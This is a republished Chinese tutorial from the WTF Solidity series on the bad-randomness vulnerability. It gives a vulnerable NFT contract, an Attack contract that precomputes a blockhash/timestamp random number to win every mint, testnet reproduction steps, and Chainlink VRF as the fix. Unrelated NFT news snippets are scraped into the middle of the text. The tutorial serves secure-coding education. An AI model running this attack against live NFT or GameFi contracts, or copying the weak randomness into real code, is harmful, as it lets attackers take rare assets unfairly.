以太坊價格 以太坊價格
Ctrl+D 以太坊價格
ads

WTF Solidity 合約安全: S07. 壞隨機數

Author:

Time:1900/1/1 0:00:00

我最近在重新學solidity,鞏固一下細節,也寫一個“WTFSolidity極簡入門”,供小白們使用,每周更新1-3講。

這一講,我們將介紹智能合約的壞隨機數漏洞和預防方法,這個漏洞經常在NFT和GameFi中出現,包括Meebits,Loots,WolfGame等。

偽隨機數

很多以太坊上的應用都需要用到隨機數,例如NFT隨機抽取tokenId、抽盲盒、gamefi戰斗中隨機分勝負等等。但是由于以太坊上所有數據都是公開透明且確定性的,它沒有其他編程語言一樣給開發者提供生成隨機數的方法,例如random()。很多項目方不得不使用鏈上的偽隨機數生成方法,例如blockhash()和keccak256()方法。

壞隨機數漏洞:攻擊者可以事先計算這些偽隨機數的結果,從而達到他們想要的目的,例如鑄造任何他們想要的稀有NFT而非隨機抽取。更多的內容可以閱讀WTFSolidity極簡教程第39講:偽隨機數。

goblintown.wtf系列NFT24小時交易額為102.41萬美元:金色財經消息,據NFTGo.io數據顯示,goblintown.wtf系列NFT總市值達6238萬美元,在所有NFT項目總市值排名中位列第39;其24小時交易額為102.41萬美元,跌幅達9.35%。截止發稿時,該系列NFT當前地板價為3.15ETH,跌幅為26.01%。[2022/6/12 4:19:11]

壞隨機數案例

下面我們學習一個有壞隨機數漏洞的NFT合約:BadRandomness.sol。

contract?BadRandomness?is?ERC721?{????uint256?totalSupply;????//?構造函數,初始化NFT合集的名稱、代號????constructor()?ERC721("",?""){}????//?鑄造函數:當輸入的?luckyNumber?等于隨機數時才能mint????function?luckyMint(uint256?luckyNumber)?external?{????????uint256?randomNumber?=?uint256(keccak256(abi.encodePacked(blockhash(block.number?-?1),?block.timestamp)))?%?100;?//?get?bad?random?number????????require(randomNumber?==?luckyNumber,?"Better?luck?next?time!");????????_mint(msg.sender,?totalSupply);?//?mint????????totalSupply++;????}}

“哥布林” GoblintTown.wtf NFT系列市值突破1億美元:金色財經報道,據最新數據顯示,“哥布林” GoblintTown.wtf NFT系列市值突破1億美元,本文撰寫時達到1.105億美元,交易額為6834萬美元。此外,該NFT系列地板價已升至7.1 ETH,24小時漲幅達到37.18%。Goblintown NFT 通過免費公售的形式在以太鏈上發售,發行總數量為 9999 個,其中Goblintown #6485以77.75 ETH成交,約合 150,507.29 美元,為目前該系列最高交易記錄。[2022/6/6 4:04:39]

它有一個主要的鑄造函數luckyMint(),用戶調用時輸入一個0-99的數字,如果和鏈上生成的偽隨機數randomNumber相等,即可鑄造幸運NFT。偽隨機數使用blockhash和block.timestamp聲稱。這個漏洞在于用戶可以完美預測生成的隨機數并鑄造NFT。

goblintown.wtf NFT系列地板價突破8ETH,24小時交易額排名達到第一:金色財經消息,據OpenSea數據顯示,goblintown.wtf NFT系列地板價突破8ETH,目前為8.2ETH,24小時的交易額為4997.18ETH,24小時交易額在OpenSea排名達到第一。[2022/6/2 3:58:03]

下面我們寫個攻擊合約Attack.sol。

contract?Attack?{????function?attackMint(BadRandomness?nftAddr)?external?{????????//?提前計算隨機數????????uint256?luckyNumber?=?uint256(????????????keccak256(abi.encodePacked(blockhash(block.number?-?1),?block.timestamp))????????)?%?100;????????//?利用?luckyNumber?攻擊????????nftAddr.luckyMint(luckyNumber);????}}

fees.wtf回應低流動性:團隊正在逐步增加流動性以防止機器人搶跑:1月14日消息,Gas 使用統計查詢網站 fees.wtf 在 Discord 社群中回應關于流動性不足的問題,并表示其在發布前提到將在發布不久之后添加流動性,但并未說明具體數量。是因為團隊不希望機器人搶先運行,并提走全部原有流動性。因此導致市場上發生了一場機器人對機器人的斗爭:

由于初始發布時的流動性很低,有機器人將 100 ETH 投入一個僅有 1 到 2 個 ETH 的流動性池中。設置很高的滑點,最終被其他機器人耗盡了全部的 ETH,是一個高滑點、低流動性的案例。

fees.wtf 團隊希望用戶沒有受到影響,一起仍按原計劃進行,團隊正在增加流動性。[2022/1/14 8:48:44]

攻擊函數attackMint()中的參數為BadRandomness合約地址。在其中,我們計算了隨機數luckyNumber,然后將它作為參數輸入到luckyMint()函數完成攻擊。由于attackMint()和luckyMint()將在同一個區塊中調用,blockhash和block.timestamp是相同的,利用他們生成的隨機數也相同。

Remix復現

由于Remix自帶的RemixVM不支持blockhash函數,因此你需要將合約部署到以太坊測試鏈上進行復現。

部署BadRandomness合約。

部署Attack合約。

將BadRandomness合約地址作為參數傳入到Attack合約的attackMint()函數并調用,完成攻擊。

調用BadRandomness合約的balanceOf查看Attack合約NFT余額,確認攻擊成功。

預防方法

我們通常使用預言機項目提供的鏈下隨機數來預防這類漏洞,例如ChainlinkVRF。這類隨機數從鏈下生成,然后上傳到鏈上,從而保證隨機數不可預測。更多介紹可以閱讀WTFSolidity極簡教程第39講:偽隨機數。

總結

這一講我們介紹了壞隨機數漏洞,并介紹了一個簡單的預防方法:使用預言機項目提供的鏈下隨機數。NFT和GameFi項目方應避免使用鏈上偽隨機數進行抽獎,以防被黑客利用。

推特:@0xAA_Science|@WTFAcademy_

社區:Discord|微信群|官網wtf.academy

所有代碼和教程開源在github:?github.com/AmazingAng/WTFSolidity

來源:bress

Tags:INTNFTWTFNUMGLINT幣zkNFTexwtf幣怎么挖Arenum

比特幣交易
WEB3:晚間必讀5篇 | 假如微信公眾號能Web3 你想試試嗎?

1.金色觀察|一覽以太坊舊金山黑客松獲獎項目11月7日,以太坊舊金山黑客松宣布13個獲獎項目,分別為mundo、FuelScape、BB3-BEEP3R、DAOCensus、melovault、.

1900/1/1 0:00:00
COI:加密城市指南:舊金山灣區

原文標題:《CryptoCity:GuidetoSanFranciscoBayArea》撰文:TurnerWright編譯:若華.

1900/1/1 0:00:00
ALA:SBF 真的挪用了 Alameda 資金?讓我們來扒一扒

撰文:ScopeProtocol 編譯:PANews 下面,就讓我們來扒一扒這件事。首先,我們把先把所有能找到的、屬于SBF的地址聚類起來,然后就會發現,其中有一個地址與Alameda的地址高度.

1900/1/1 0:00:00
BAYC:BAYC 地板價跌破 50E BendDAO 清算風暴再度來襲?

原文來源:angelilu,ForesightNewsFTX暴雷對市場的影響已從各大交易所蔓延至NFT市場,根據OpenSea數據.

1900/1/1 0:00:00
CEX:CEX暴雷頻頻 Web3錢包賽道迎來怎樣的機遇?

原文標題:《80億虧空帶走FTX,錢包安全方案才能守護住Web3底線》 原文來源:R3PO 加密貨幣交易平臺FTX?掀起幣圈雷曼風暴,比特幣、以太坊等應聲大跌,加密貨幣圈受到重創.

1900/1/1 0:00:00
FTT:FTX千鈞一發之際 給加密行業哪些警示?

加密行業永遠不缺戲劇,昨夜今晨的兩次驚天逆轉,讓社區用戶跟著“提心吊膽”。而事情的結局令人失望,因為針對2008年雷曼兄弟時刻而催生的加密貨幣行業卻重走了雷曼之路.

1900/1/1 0:00:00
ads